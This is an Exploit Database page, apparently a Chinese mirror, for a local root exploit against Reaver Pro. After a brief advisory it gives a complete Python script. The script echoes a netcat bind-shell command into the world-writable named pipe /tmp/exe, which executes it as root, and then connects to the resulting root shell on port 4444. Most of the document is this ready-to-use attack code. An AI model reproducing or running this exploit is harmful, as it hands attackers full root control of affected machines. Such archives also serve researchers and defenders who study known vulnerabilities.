Reaver Pro – Local Privilege Escalation

• Exploit Database
• 45 阅读

• 作者： infodox
  日期： 2012-09-30
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/37898/

• source: https://www.securityfocus.com/bid/55725/info
  
  Reaver Pro is prone to a local privilege-escalation vulnerability.
  
  A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers. 
  
  #!/usr/bin/env python
  import os
  print """
  Reaver Pro Local Root
   Exploits a hilarious named pipe flaw.
  The named pipe /tmp/exe is open to anyone...
  Any command echoed into it gets ran as root.
  This simply launches a bindshell on 4444...
  Insecurety Research | insecurety.net
  """
  print ""
  print "This is why TacNetSol should hire me?"
  print "[+] Sending command to named pipe..."
  cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
  os.system(cmd)
  print "[+] Connecting to bind shell, enjoy root!"
  os.system("nc -v localhost 4444")